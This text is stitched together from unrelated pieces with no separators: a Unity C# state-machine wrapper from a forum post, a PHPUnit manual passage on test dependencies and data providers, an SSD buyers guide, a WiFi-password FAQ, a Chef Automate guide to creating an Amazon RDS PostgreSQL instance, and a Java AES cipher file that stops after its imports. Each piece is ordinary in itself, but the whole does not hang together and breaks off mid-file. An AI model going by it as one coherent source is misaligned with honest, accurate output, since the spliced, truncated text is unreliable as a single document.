            behaviourCache.Add (nameHash, item.behaviours);
            SetBehavioursEnabled (item.behaviours, false);
        }
    }

    void Update ()
    {
        currentStateTime += Time.deltaTime;
        int state = animator.GetCurrentAnimatorStateInfo (0).nameHash;
        if (state != currentState) {
            ChangeState (state);
        }
    }

    void ChangeState (int toState)
    {
        if (behaviourCache.ContainsKey (currentState)) {
            SetBehavioursEnabled (behaviourCache [currentState], false);
        }
        if (behaviourCache.ContainsKey (toState)) {
            SetBehavioursEnabled (behaviourCache [toState], true);
        }
        currentState = toState;
        currentStateTime = 0f;
    }

    void SetBehavioursEnabled (Behaviour[] behaviours, bool enabled)
    {
        foreach (Behaviour behaviour in behaviours) {
            behaviour.enabled = enabled;
        }
    }

    [System.Serializable]
    public class StateBehaviour
    {
        public string state;
        public string layer = "Base Layer";
        public Behaviour[] behaviours;
    }
}

One important note: In these state machines, I'm using a transition time of 0. I'm not certain if states overlap during a transition with time > 0, so keep that in mind when creating your Mecanim state machines.

Hope you find this useful!

Last edited: Oct 13, 2014
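The enable/disable bookkeeping at the heart of MecanimWrapper is independent of Unity. As a rough language-agnostic sketch (plain Python stand-ins, not the Unity API): map state names to behaviour objects and toggle their enabled flags whenever the active state changes.

```python
class Behaviour:
    """Toy stand-in for a Unity Behaviour with an 'enabled' flag."""
    def __init__(self, name):
        self.name = name
        self.enabled = False

class StateMachineWrapper:
    def __init__(self, state_behaviours):
        # state_behaviours: dict mapping state name -> list of Behaviours
        self.state_behaviours = state_behaviours
        self.current_state = None

    def update(self, active_state):
        # Called once per frame with the state machine's active state.
        if active_state == self.current_state:
            return
        # Disable behaviours of the state we are leaving...
        for b in self.state_behaviours.get(self.current_state, []):
            b.enabled = False
        # ...and enable behaviours of the state we are entering.
        for b in self.state_behaviours.get(active_state, []):
            b.enabled = True
        self.current_state = active_state

idle, chase = Behaviour("AiGroundIdle"), Behaviour("AiGroundChase")
ai = StateMachineWrapper({"idle": [idle], "chase": [chase]})
ai.update("idle")
print(idle.enabled, chase.enabled)   # True False
ai.update("chase")
print(idle.enabled, chase.enabled)   # False True
```

Unity 5's StateMachineBehaviour moves this responsibility into the engine via OnStateEnter/OnStateExit callbacks, which is why the wrapper above is framed as an interim solution.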
2. Writing Tests for PHPUnit

Example 2.1 shows how we can write tests using PHPUnit that exercise PHP’s array operations. The example introduces the basic conventions and steps for writing tests with PHPUnit:

1. The tests for a class Class go into a class ClassTest.
2. ClassTest inherits (most of the time) from PHPUnit\Framework\TestCase.
3. The tests are public methods that are named test*. Alternatively, you can use the @test annotation in a method’s docblock to mark it as a test method.
4. Inside the test methods, assertion methods such as assertSame() (see Assertions) are used to assert that an actual value matches an expected value.

Example 2.1 Testing array operations with PHPUnit

<?php
use PHPUnit\Framework\TestCase;

class StackTest extends TestCase
{
    public function testPushAndPop()
    {
        $stack = [];
        $this->assertSame(0, count($stack));

        array_push($stack, 'foo');
        $this->assertSame('foo', $stack[count($stack)-1]);
        $this->assertSame(1, count($stack));

        $this->assertSame('foo', array_pop($stack));
        $this->assertSame(0, count($stack));
    }
}

Martin Fowler: Whenever you are tempted to type something into a print statement or a debugger expression, write it as a test instead.

Test Dependencies

Adrian Kuhn et al.: Unit Tests are primarily written as a good practice to help developers identify and fix bugs, to refactor code and to serve as documentation for a unit of software under test. To achieve these benefits, unit tests ideally should cover all the possible paths in a program. One unit test usually covers one specific path in one function or method. However a test method is not necessarily an encapsulated, independent entity. Often there are implicit dependencies between test methods, hidden in the implementation scenario of a test.

PHPUnit supports the declaration of explicit dependencies between test methods.
Such dependencies do not define the order in which the test methods are to be executed, but they allow the returning of an instance of the test fixture by a producer and passing it to the dependent consumers.

• A producer is a test method that yields its unit under test as return value.
• A consumer is a test method that depends on one or more producers and their return values.

Example 2.2 shows how to use the @depends annotation to express dependencies between test methods.

Example 2.2 Using the @depends annotation to express dependencies

<?php
use PHPUnit\Framework\TestCase;

class StackTest extends TestCase
{
    public function testEmpty()
    {
        $stack = [];
        $this->assertEmpty($stack);

        return $stack;
    }

    /**
     * @depends testEmpty
     */
    public function testPush(array $stack)
    {
        array_push($stack, 'foo');
        $this->assertSame('foo', $stack[count($stack)-1]);
        $this->assertNotEmpty($stack);

        return $stack;
    }

    /**
     * @depends testPush
     */
    public function testPop(array $stack)
    {
        $this->assertSame('foo', array_pop($stack));
        $this->assertEmpty($stack);
    }
}

In the example above, the first test, testEmpty(), creates a new array and asserts that it is empty. The test then returns the fixture as its result. The second test, testPush(), depends on testEmpty() and is passed the result of that depended-upon test as its argument. Finally, testPop() depends upon testPush().

Note

The return value yielded by a producer is passed “as-is” to its consumers by default. This means that when a producer returns an object, a reference to that object is passed to the consumers. Instead of a reference either (a) a (deep) copy via @depends clone, or (b) a (normal shallow) clone (based on PHP keyword clone) via @depends shallowClone are possible too.

To quickly localize defects, we want our attention to be focussed on relevant failing tests. This is why PHPUnit skips the execution of a test when a depended-upon test has failed.
This improves defect localization by exploiting the dependencies between tests as shown in Example 2.3. Example 2.3 Exploiting the dependencies between tests <?php use PHPUnit\Framework\TestCase; class DependencyFailureTest extends TestCase { public function testOne() { $this->assertTrue(false); } /** * @depends testOne */ public function testTwo() { } } $ phpunit --verbose DependencyFailureTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. FS Time: 0 seconds, Memory: 5.00Mb There was 1 failure: 1) DependencyFailureTest::testOne Failed asserting that false is true. /home/sb/DependencyFailureTest.php:6 There was 1 skipped test: 1) DependencyFailureTest::testTwo This test depends on "DependencyFailureTest::testOne" to pass. FAILURES! Tests: 1, Assertions: 1, Failures: 1, Skipped: 1. A test may have more than one @depends annotation. PHPUnit does not change the order in which tests are executed, you have to ensure that the dependencies of a test can actually be met before the test is run. A test that has more than one @depends annotation will get a fixture from the first producer as the first argument, a fixture from the second producer as the second argument, and so on. See Example 2.4 Example 2.4 Test with multiple dependencies <?php use PHPUnit\Framework\TestCase; class MultipleDependenciesTest extends TestCase { public function testProducerFirst() { $this->assertTrue(true); return 'first'; } public function testProducerSecond() { $this->assertTrue(true); return 'second'; } /** * @depends testProducerFirst * @depends testProducerSecond */ public function testConsumer($a, $b) { $this->assertSame('first', $a); $this->assertSame('second', $b); } } $ phpunit --verbose MultipleDependenciesTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ... Time: 0 seconds, Memory: 3.25Mb OK (3 tests, 3 assertions) Data Providers A test method can accept arbitrary arguments. 
These arguments are to be provided by a data provider method (additionProvider() in Example 2.5). The data provider method to be used is specified using the @dataProvider annotation. A data provider method must be public and either return an array of arrays or an object that implements the Iterator interface and yields an array for each iteration step. For each array that is part of the collection the test method will be called with the contents of the array as its arguments. Example 2.5 Using a data provider that returns an array of arrays <?php use PHPUnit\Framework\TestCase; class DataTest extends TestCase { /** * @dataProvider additionProvider */ public function testAdd($a, $b, $expected) { $this->assertSame($expected, $a + $b); } public function additionProvider() { return [ [0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 3] ]; } } $ phpunit DataTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) DataTest::testAdd with data set #3 (1, 1, 3) Failed asserting that 2 is identical to 3. /home/sb/DataTest.php:9 FAILURES! Tests: 4, Assertions: 4, Failures: 1. When using a large number of datasets it’s useful to name each one with string key instead of default numeric. Output will be more verbose as it’ll contain that name of a dataset that breaks a test. Example 2.6 Using a data provider with named datasets <?php use PHPUnit\Framework\TestCase; class DataTest extends TestCase { /** * @dataProvider additionProvider */ public function testAdd($a, $b, $expected) { $this->assertSame($expected, $a + $b); } public function additionProvider() { return [ 'adding zeros' => [0, 0, 0], 'zero plus one' => [0, 1, 1], 'one plus zero' => [1, 0, 1], 'one plus one' => [1, 1, 3] ]; } } $ phpunit DataTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) DataTest::testAdd with data set "one plus one" (1, 1, 3) Failed asserting that 2 is identical to 3. 
/home/sb/DataTest.php:9 FAILURES! Tests: 4, Assertions: 4, Failures: 1. Example 2.7 Using a data provider that returns an Iterator object <?php use PHPUnit\Framework\TestCase; require 'CsvFileIterator.php'; class DataTest extends TestCase { /** * @dataProvider additionProvider */ public function testAdd($a, $b, $expected) { $this->assertSame($expected, $a + $b); } public function additionProvider() { return new CsvFileIterator('data.csv'); } } $ phpunit DataTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) DataTest::testAdd with data set #3 ('1', '1', '3') Failed asserting that 2 is identical to 3. /home/sb/DataTest.php:11 FAILURES! Tests: 4, Assertions: 4, Failures: 1. Example 2.8 The CsvFileIterator class <?php use PHPUnit\Framework\TestCase; class CsvFileIterator implements Iterator { protected $file; protected $key = 0; protected $current; public function __construct($file) { $this->file = fopen($file, 'r'); } public function __destruct() { fclose($this->file); } public function rewind() { rewind($this->file); $this->current = fgetcsv($this->file); $this->key = 0; } public function valid() { return !feof($this->file); } public function key() { return $this->key; } public function current() { return $this->current; } public function next() { $this->current = fgetcsv($this->file); $this->key++; } } When a test receives input from both a @dataProvider method and from one or more tests it @depends on, the arguments from the data provider will come before the ones from depended-upon tests. The arguments from depended-upon tests will be the same for each data set. 
See Example 2.9 Example 2.9 Combination of @depends and @dataProvider in same test <?php use PHPUnit\Framework\TestCase; class DependencyAndDataProviderComboTest extends TestCase { public function provider() { return [['provider1'], ['provider2']]; } public function testProducerFirst() { $this->assertTrue(true); return 'first'; } public function testProducerSecond() { $this->assertTrue(true); return 'second'; } /** * @depends testProducerFirst * @depends testProducerSecond * @dataProvider provider */ public function testConsumer() { $this->assertSame( ['provider1', 'first', 'second'], func_get_args() ); } } $ phpunit --verbose DependencyAndDataProviderComboTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. ...F Time: 0 seconds, Memory: 3.50Mb There was 1 failure: 1) DependencyAndDataProviderComboTest::testConsumer with data set #1 ('provider2') Failed asserting that two arrays are identical. --- Expected +++ Actual @@ @@ Array &0 ( - 0 => 'provider1' + 0 => 'provider2' 1 => 'first' 2 => 'second' ) /home/sb/DependencyAndDataProviderComboTest.php:32 FAILURES! Tests: 4, Assertions: 4, Failures: 1. Note When a test depends on a test that uses data providers, the depending test will be executed when the test it depends upon is successful for at least one data set. The result of a test that uses data providers cannot be injected into a depending test. Note All data providers are executed before both the call to the setUpBeforeClass static method and the first call to the setUp method. Because of that you can’t access any variables you create there from within a data provider. This is required in order for PHPUnit to be able to compute the total number of tests. Testing Exceptions Example 2.10 shows how to use the expectException() method to test whether an exception is thrown by the code under test. 
Example 2.10 Using the expectException() method <?php use PHPUnit\Framework\TestCase; class ExceptionTest extends TestCase { public function testException() { $this->expectException(InvalidArgumentException::class); } } $ phpunit ExceptionTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 4.75Mb There was 1 failure: 1) ExceptionTest::testException Failed asserting that exception of type "InvalidArgumentException" is thrown. FAILURES! Tests: 1, Assertions: 1, Failures: 1. In addition to the expectException() method the expectExceptionCode(), expectExceptionMessage(), and expectExceptionMessageRegExp() methods exist to set up expectations for exceptions raised by the code under test. Note Note that expectExceptionMessage asserts that the $actual message contains the $expected message and doesn’t perform an exact string comparison. Alternatively, you can use the @expectedException, @expectedExceptionCode, @expectedExceptionMessage, and @expectedExceptionMessageRegExp annotations to set up expectations for exceptions raised by the code under test. Example 2.11 shows an example. Example 2.11 Using the @expectedException annotation <?php use PHPUnit\Framework\TestCase; class ExceptionTest extends TestCase { /** * @expectedException InvalidArgumentException */ public function testException() { } } $ phpunit ExceptionTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 4.75Mb There was 1 failure: 1) ExceptionTest::testException Failed asserting that exception of type "InvalidArgumentException" is thrown. FAILURES! Tests: 1, Assertions: 1, Failures: 1. Testing PHP Errors By default, PHPUnit converts PHP errors, warnings, and notices that are triggered during the execution of a test to an exception. Using these exceptions, you can, for instance, expect a test to trigger a PHP error as shown in Example 2.12. 
Note PHP’s error_reporting runtime configuration can limit which errors PHPUnit will convert to exceptions. If you are having issues with this feature, be sure PHP is not configured to suppress the type of errors you’re testing. Example 2.12 Expecting a PHP error using @expectedException <?php use PHPUnit\Framework\TestCase; class ExpectedErrorTest extends TestCase { /** * @expectedException PHPUnit\Framework\Error\Error */ public function testFailingInclude() { include 'not_existing_file.php'; } } $ phpunit -d error_reporting=2 ExpectedErrorTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. . Time: 0 seconds, Memory: 5.25Mb OK (1 test, 1 assertion) PHPUnit\Framework\Error\Notice and PHPUnit\Framework\Error\Warning represent PHP notices and warnings, respectively. Note You should be as specific as possible when testing exceptions. Testing for classes that are too generic might lead to undesirable side-effects. Accordingly, testing for the Exception class with @expectedException or expectException() is no longer permitted. When testing that relies on php functions that trigger errors like fopen it can sometimes be useful to use error suppression while testing. This allows you to check the return values by suppressing notices that would lead to a phpunit PHPUnit\Framework\Error\Notice. Example 2.13 Testing return values of code that uses PHP Errors <?php use PHPUnit\Framework\TestCase; class ErrorSuppressionTest extends TestCase { public function testFileWriting() { $writer = new FileWriter; $this->assertFalse(@$writer->write('/is-not-writeable/file', 'stuff')); } } class FileWriter { public function write($file, $content) { $file = fopen($file, 'w'); if($file == false) { return false; } // ... } } $ phpunit ErrorSuppressionTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. . 
Time: 1 seconds, Memory: 5.25Mb OK (1 test, 1 assertion) Without the error suppression the test would fail reporting fopen(/is-not-writeable/file): failed to open stream: No such file or directory. Testing Output Sometimes you want to assert that the execution of a method, for instance, generates an expected output (via echo or print, for example). The PHPUnit\Framework\TestCase class uses PHP’s Output Buffering feature to provide the functionality that is necessary for this. Example 2.14 shows how to use the expectOutputString() method to set the expected output. If this expected output is not generated, the test will be counted as a failure. Example 2.14 Testing the output of a function or method <?php use PHPUnit\Framework\TestCase; class OutputTest extends TestCase { public function testExpectFooActualFoo() { $this->expectOutputString('foo'); print 'foo'; } public function testExpectBarActualBaz() { $this->expectOutputString('bar'); print 'baz'; } } $ phpunit OutputTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. .F Time: 0 seconds, Memory: 5.75Mb There was 1 failure: 1) OutputTest::testExpectBarActualBaz Failed asserting that two strings are equal. --- Expected +++ Actual @@ @@ -'bar' +'baz' FAILURES! Tests: 2, Assertions: 2, Failures: 1. Table 2.1 shows the methods provided for testing output Table 2.1 Methods for testing output Method Meaning void expectOutputRegex(string $regularExpression) Set up the expectation that the output matches a $regularExpression. void expectOutputString(string $expectedString) Set up the expectation that the output is equal to an $expectedString. bool setOutputCallback(callable $callback) Sets up a callback that is used to, for instance, normalize the actual output. string getActualOutput() Get the actual output. Note A test that emits output will fail in strict mode. Error output Whenever a test fails PHPUnit tries its best to provide you with as much context as possible that can help to identify the problem. 
Example 2.15 Error output generated when an array comparison fails <?php use PHPUnit\Framework\TestCase; class ArrayDiffTest extends TestCase { public function testEquality() { $this->assertSame( [1, 2, 3, 4, 5, 6], [1, 2, 33, 4, 5, 6] ); } } $ phpunit ArrayDiffTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 5.25Mb There was 1 failure: 1) ArrayDiffTest::testEquality Failed asserting that two arrays are identical. --- Expected +++ Actual @@ @@ Array ( 0 => 1 1 => 2 - 2 => 3 + 2 => 33 3 => 4 4 => 5 5 => 6 ) /home/sb/ArrayDiffTest.php:7 FAILURES! Tests: 1, Assertions: 1, Failures: 1. In this example only one of the array values differs and the other values are shown to provide context on where the error occurred. When the generated output would be long to read PHPUnit will split it up and provide a few lines of context around every difference. Example 2.16 Error output when an array comparison of an long array fails <?php use PHPUnit\Framework\TestCase; class LongArrayDiffTest extends TestCase { public function testEquality() { $this->assertSame( [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3, 4, 5, 6], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 33, 4, 5, 6] ); } } $ phpunit LongArrayDiffTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 5.25Mb There was 1 failure: 1) LongArrayDiffTest::testEquality Failed asserting that two arrays are identical. --- Expected +++ Actual @@ @@ 11 => 0 12 => 1 13 => 2 - 14 => 3 + 14 => 33 15 => 4 16 => 5 17 => 6 ) /home/sb/LongArrayDiffTest.php:7 FAILURES! Tests: 1, Assertions: 1, Failures: 1. Edge cases When a comparison fails PHPUnit creates textual representations of the input values and compares those. Due to that implementation a diff might show more problems than actually exist. This only happens when using assertEquals or other ‘weak’ comparison functions on arrays or objects. 
Example 2.17 Edge case in the diff generation when using weak comparison <?php use PHPUnit\Framework\TestCase; class ArrayWeakComparisonTest extends TestCase { public function testEquality() { $this->assertEquals( [1, 2, 3, 4, 5, 6], ['1', 2, 33, 4, 5, 6] ); } } $ phpunit ArrayWeakComparisonTest PHPUnit 7.0.0 by Sebastian Bergmann and contributors. F Time: 0 seconds, Memory: 5.25Mb There was 1 failure: 1) ArrayWeakComparisonTest::testEquality Failed asserting that two arrays are equal. --- Expected +++ Actual @@ @@ Array ( - 0 => 1 + 0 => '1' 1 => 2 - 2 => 3 + 2 => 33 3 => 4 4 => 5 5 => 6 ) /home/sb/ArrayWeakComparisonTest.php:7 FAILURES! Tests: 1, Assertions: 1, Failures: 1. In this example the difference in the first index between 1 and '1' is reported even though assertEquals considers the values as a match.
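As a rough analogy in Python (illustrative only — PHPUnit's actual comparators are more involved), the difference between assertEquals and assertSame is the difference between a type-coercing comparison and one that also requires identical types. That is why the diff above flags 1 vs '1' even though the weak comparison accepts the pair as equal:

```python
def weak_equals(a, b):
    # Rough model of PHP's ==: coerce numeric strings to
    # numbers before comparing, so '1' == 1 holds.
    def coerce(x):
        if isinstance(x, str):
            try:
                return float(x)
            except ValueError:
                return x
        return x
    return coerce(a) == coerce(b)

def strict_equals(a, b):
    # Rough model of PHP's ===: same type and same value.
    return type(a) is type(b) and a == b

print(weak_equals(1, '1'))    # True  — assertEquals-style match
print(strict_equals(1, '1'))  # False — assertSame-style mismatch
```

This is also why the manual recommends assertSame where practical: strict comparison never hides a type difference behind a coincidentally equal value.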
SSD Buyers Guide

When you build that high-performance, custom PC it’s easy to see the benefits of a faster processor or beefier graphics card, but high-performance storage is still a confusing topic. Instead of having two major brands to choose from, as with processors or graphics cards, there are many different types of SSD, all of which perform differently in some way. To add even more confusion, drives are then sold by partners with completely different names rather than keeping the original designer's branding in the same way as Nvidia or ATI’s GeForce or Radeon graphics cards.

With this in mind, we’ve decided to knock together an SSD buyers guide, listing the different controllers and their pros and cons, as well as exactly which SSDs use which controller. While some drive manufacturers claim that only enthusiasts care about what’s inside an SSD, we feel the continued high price of drives means that people need to know exactly what's in the box before they buy one.

SSD basics

An SSD is very different to a typical hard disk because it uses flash memory rather than spinning platters of data. A hard disk works a bit like a record player or DVD – the data is stored in tight tracks on a circular disk which a read/write head must find as the disk spins underneath it. While modern hard disks are amazingly complex, the technology has its drawbacks – it takes a while for the read/write head to find the correct data path, hard disks can be noisy and hot, and they are relatively fragile.

An SSD avoids most of these issues as it uses NAND flash chips for its storage, and not a spinning data platter. All SSDs have a central controller chip which manages the data flowing into and out of the storage chips. There are wildly different implementations of how this arrangement works, leading to massive differences from one drive to another, hence the need for some clarity.
SSDs and hard disks are very different beasts.

This arrangement of controller chip and NAND flash allows a decent SSD to be much faster than a hard disk, giving you a more responsive PC, while also being much more rugged, cool and silent. However, SSDs are also much more expensive per gigabyte than a hard disk, mainly due to the price of high-capacity NAND flash chips.

What makes an SSD so much faster than a hard disk?

• Near-instant access times
The key to SSDs being so much faster than mechanical hard disks is access times. On SandForce SSDs, such as the 240GB Corsair F240, the read access time can be as low as 1/10th of a millisecond, in comparison to around 14ms for a high-performance 7,200rpm hard disk such as the Samsung SpinPoint F3. This means that every time the SSD goes to read or write a file, it does so over 100 times faster than a hard disk. In read-heavy circumstances (booting an operating system or loading a game) where hundreds or thousands of individual files might need to be read, this advantage adds up and means that even an SSD with low sequential read/write speeds can be many times faster than a hard disk.

• High sequential speeds
Sequential speed is how quickly a drive is able to read or write a large, contiguous file from or to the drive, whereas random speed is how quickly the drive can cope with many small files being read from or written to random places on the drive. Sequential read speed is typically affected by the drive controller and the NAND flash memory used. Sequential write speed can be affected by the drive's capacity, either because a low-capacity drive uses slower lower-density chips or because it uses fewer chips, which reduces the amount of storage that the drive controller can address simultaneously.
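The access-time advantage described above is simple arithmetic. A rough sketch, using the illustrative figures from this guide (0.1ms for a SandForce-class SSD, 14ms for a 7,200rpm disk) rather than measured data:

```python
ssd_access_ms = 0.1   # SandForce-class SSD read access time (~1/10th of a ms)
hdd_access_ms = 14.0  # high-performance 7,200rpm hard disk

# Small files touched during a read-heavy task such as booting an OS
files = 1000

# Pure access latency accumulated over all those reads, in seconds
ssd_total_s = files * ssd_access_ms / 1000
hdd_total_s = files * hdd_access_ms / 1000

print(f"SSD: {ssd_total_s:.1f} s of access latency for {files} files")
print(f"HDD: {hdd_total_s:.1f} s of access latency for {files} files")
print(f"The SSD begins each read about {hdd_access_ms / ssd_access_ms:.0f}x sooner")
```

Real boot times also depend on sequential throughput and queuing, but the latency gap alone explains why even a modest SSD feels far quicker than a hard disk.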
• High random read speed
The ‘random’ performance of a storage device is how well it copes with many files in different (random) places being read from or written to it. Random read speed is dependent on both the drive’s access times and the ability of the drive controller to cope with a flood of different commands. It’s best explained by heavy multi-tasking, where the drive needs to read many different small files. In real-world situations, drive performance is more a combination of sequential and random read performance, as file sizes vary.

• High random write speed
Random write performance is a more contentious issue, as it’s the area in which the first batch of consumer SSDs fell short, with the drive controller easily getting flooded with random write requests. This led to the drive stalling, unable to do anything for ages – the problem manifested itself in benchmark results as a high maximum latency. Thankfully, the issue is now fixed, with the majority of consumer SSDs offering random write speeds at least five times higher than that of a fast hard disk. Heavy random write workloads typically arise when making many small writes to log files, the registry, or temporary folders. However, random write speed will have an impact when making simultaneous writes to the drive, working in combination with the sequential write speed in real-world situations.

A good SSD should be able to deliver on all five aspects of performance: low access times, high sequential read and write, and high random read and write. On a great SSD, all five factors will combine to deliver a faster, more responsive PC in every situation.
Where Can I Find My WiFi Password?

Can I see my WiFi password on my iPhone?
You’ll be able to see your WiFi password on your iPhone with this procedure in no time. From the main screen of your iPhone, open the Settings app. Tap on WiFi on the following screen. Then tap on the icon next to your WiFi network and it’ll open the screen detailing your WiFi information.

Is there an app to get free WiFi?
Free Zone is an Android app that automatically discovers which of the hotspots around you actually work. You can get access to WiFi passwords shared by others to access local cafes’ or restaurants’ hotspots. The app automatically notifies you if you’re near one of the 5 million hotspots in its database.

How do I see the password for my wireless network on Android?
If you’ve got a Google Pixel phone with Android 10, this is the easiest way possible to find your WiFi password. Go to Settings > Network & Internet > WiFi. Tap on the name of the WiFi network you want to recover the password from to get to the Network Details screen. Tap on the Share button.

How do I change my home WiFi password?
There are two ways to change your network name and password. For Android devices, tap the menu icon in the upper-left corner of the screen, then tap Internet. Tap the Wireless Gateway. Select “Change WiFi Settings.” Enter your new network name and password.

How do I find out what my WiFi network password is?
See Wi-Fi Password on Android: if you’re lucky enough to be running Android 10, it’s easily accessible: just head to Settings > Network & Internet > Wi-Fi and select the network in question. (If you aren’t currently connected, you’ll need to tap Saved Networks to see other networks you’ve connected to in the past.)

How do I find my AirPort WiFi password?
Tap on the AirPort Utility. Tap on the appropriate AirPort base station, and then tap on Edit. Tap on Advanced > Show Passwords. (Note: the wireless security password will be listed after “Main Network”; the base station administrator password will be listed after “Base Station.”)

How do I find my router username and password without resetting it?
You can look at the sticker on the back of your router. It is the easiest way to find the router username and password without resetting, since the sticker carries all the information you need to access the router’s web user interface.

How do I find out my router username and password?
To locate the default username and password for the router, look in its manual. If you’ve lost the manual, you can often find it by searching for your router’s model number and “manual” on Google. Or just search for your router’s model and “default password.”

How do I reset my router password if I forgot it?
If you can’t access the router’s web-based setup page or forgot the router’s password, you may reset the router to its default factory settings. To do this, press and hold the Reset button for 10 seconds. NOTE: Resetting your router to its default factory settings will also reset your router’s password.

Why can’t I see my WiFi password?
Right-click a saved Wi-Fi network, select Status, and click the “Wireless Properties” button. Click over to the Security tab and check the “Show characters” box to view the saved Wi-Fi password. … If the laptop is not connected, you won’t see the “Wireless Properties” button at all in the “Wi-Fi Status” window.

Which app can show WiFi passwords?
WiFi Password Show is an app that displays the passwords for all the WiFi networks you’ve ever connected to. You do need to have root privileges on your Android smartphone to use it, though. It’s important to understand that this app is NOT for hacking WiFi networks or anything like that.
How do I access my router without a password?
If you can’t access the router’s web-based setup page or forgot the router’s password, you may reset the router to its default factory settings. To do this, press and hold the Reset button for 10 seconds. NOTE: Resetting your router to its default factory settings will also reset your router’s password.

Is it possible to hack a WiFi password?
Routers with WEP security are easy to hack. WEP is a type of encryption tool used to secure your wireless connection. … The most common mistake that many of us make is using the default WiFi password. Hackers can use the default password to not only hack your WiFi connection but also gain access to the connected devices.
Skip to main content Create an Amazon RDS PostgreSQL Instance and Obtain Connection Details Note Chef Automate 4.10.1 released on 6th September 2023 includes improvements to the deployment and installation experience of Automate HA. Please read the blog to learn more about key improvements. Refer to the pre-requisites page (On-Premises, AWS) and plan your usage with your customer success manager or account manager. You can follow the AWS documentation directly for detailed steps on how to create an Amazon RDS PostgreSQL Instance. Below is our guide on the steps required to create an Amazon RDS PostgreSQL instance. This guide will walk you through creating an Amazon RDS PostgreSQL instance and retrieving the necessary connection details, including the hostname, port, username, and password. Prerequisites Before proceeding, make sure you have the following prerequisites in place: • An active AWS account • Sufficient permissions to create Amazon RDS instances Step 1: Sign in to the AWS Management Console 1. Open your preferred web browser and go to the AWS Management Console. 2. Sign in to your AWS account using your credentials. Step 2: Navigate to the Amazon RDS Dashboard 1. Once logged in to the AWS Management Console, search for RDS in the search bar at the top of the page. 2. Click on the Amazon RDS service from the search results to open the Amazon RDS dashboard. Step 3: Create a New Amazon RDS PostgreSQL Instance 1. Click on Create database button in the Amazon RDS dashboard. 2. On the Choose a database creation method page, select the Standard Create option. 3. Under the Engine options section, select PostgreSQL as the database engine. 4. Choose PostgreSQL 13.5-R1. 5. Under the Templates section, select the template that suits your needs or choose the default template. 6. In the Settings section, provide the following information: • DB instance identifier: Enter a unique identifier for your RDS instance. 
• Master username: Specify the username for the master user account. • Master password: Set a secure password for the master user account. 7. In the Instance configuration section, select the appropriate instance size for your needs. 8. In the Connectivity section, • In Compute resource, select Don’t connect to an EC2 compute resource. • Select Network type as per your requirements. • In Virtual private cloud, select the VPC you want to use for your Automate cluster. • In DB subnet group, choose any private subnet available in your VPC. • In Public Access select NO 9. Configure the remaining settings as per your requirements. 10. Review all the settings and make sure they are accurate. 11. Click on the Create database button to start the creation process. Step 4: Wait for the Amazon RDS Instance to be Created 1. The RDS instance creation process may take a few minutes. Wait for the process to complete. 2. You can monitor the progress of the instance creation on the Amazon RDS dashboard. Step 5: Open the port in the RDS security group 1. Go to the Amazon RDS dashboard. 2. Find and select your newly created PostgreSQL instance from the list. 3. In the instance details view, navigate to the Connectivity & security tab. 4. Open the Security Group under VPC security groups. 5. Under Inbound Rules, edit and select Type as PostgreSQL. 6. Select Source as custom and give appropriate cidr block for your VPC. 7. Click on Save Rules. Step 6: Retrieve Connection Details Once the Amazon RDS PostgreSQL instance is created successfully, you can obtain the necessary connection details. 1. Go to the Amazon RDS dashboard. 2. Find and select your newly created PostgreSQL instance from the list. 3. In the instance details view, navigate to the Connectivity & security tab. 4. Here, you will find the following connection details: • Instance URL: This is the endpoint or hostname of your RDS instance. It will look something like my-rds-instance.abcdefg12345.us-east-1.rds.amazonaws.com. 
• Port: The port number your PostgreSQL instance listens to. The default port is usually 5432.
• Username: The username of the master user account you specified during instance creation.
• Password: The password for the master user account.

Step 7: Connect to Your Amazon RDS PostgreSQL Instance

Using the connection details obtained in the previous step, you can now connect to your Amazon RDS PostgreSQL instance from Automate.

Congratulations! You have successfully created an Amazon RDS PostgreSQL instance, and it’s ready to be used with Automate.
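As a quick sanity check before wiring the instance into Automate, the pieces from Step 6 can be assembled into a standard PostgreSQL connection URI and tried with `psql` or any other client. A minimal sketch — the hostname, username, and password below are placeholders, not values from this guide:

```python
from urllib.parse import quote

def build_postgres_uri(host, port, user, password, dbname="postgres"):
    """Assemble a libpq-style connection URI, percent-encoding the
    credentials so special characters in the password survive."""
    return (
        f"postgresql://{quote(user, safe='')}:{quote(password, safe='')}"
        f"@{host}:{port}/{dbname}"
    )

# Placeholder values -- substitute what your Connectivity & security tab shows
uri = build_postgres_uri(
    host="my-rds-instance.abcdefg12345.us-east-1.rds.amazonaws.com",
    port=5432,
    user="automate",
    password="s3cret!pass",
)
print(uri)
```

The resulting string can be passed to `psql "<uri>"` from a machine inside the same VPC — remember that Step 5 only opened port 5432 to your VPC's CIDR block, and public access was disabled during creation.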
/*
 * [TestCipherAES.java]
 *
 * Summary: Demonstrate use of CipherOutputStream and CipherInputStream to encipher and decipher a message.
 *
 * Copyright: (c) 2009-2017 Roedy Green, Canadian Mind Products, http://mindprod.com
 *
 * Licence: This software may be copied and used freely for any purpose but military.
 *          http://mindprod.com/contact/nonmil.html
 *
 * Requires: JDK 1.8+
 *
 * Created with: JetBrains IntelliJ IDEA IDE http://www.jetbrains.com/idea/
 *
 * Version History:
 *  1.0 2008-06-17
 */
package com.mindprod.example;

import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.CipherOutputStream;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
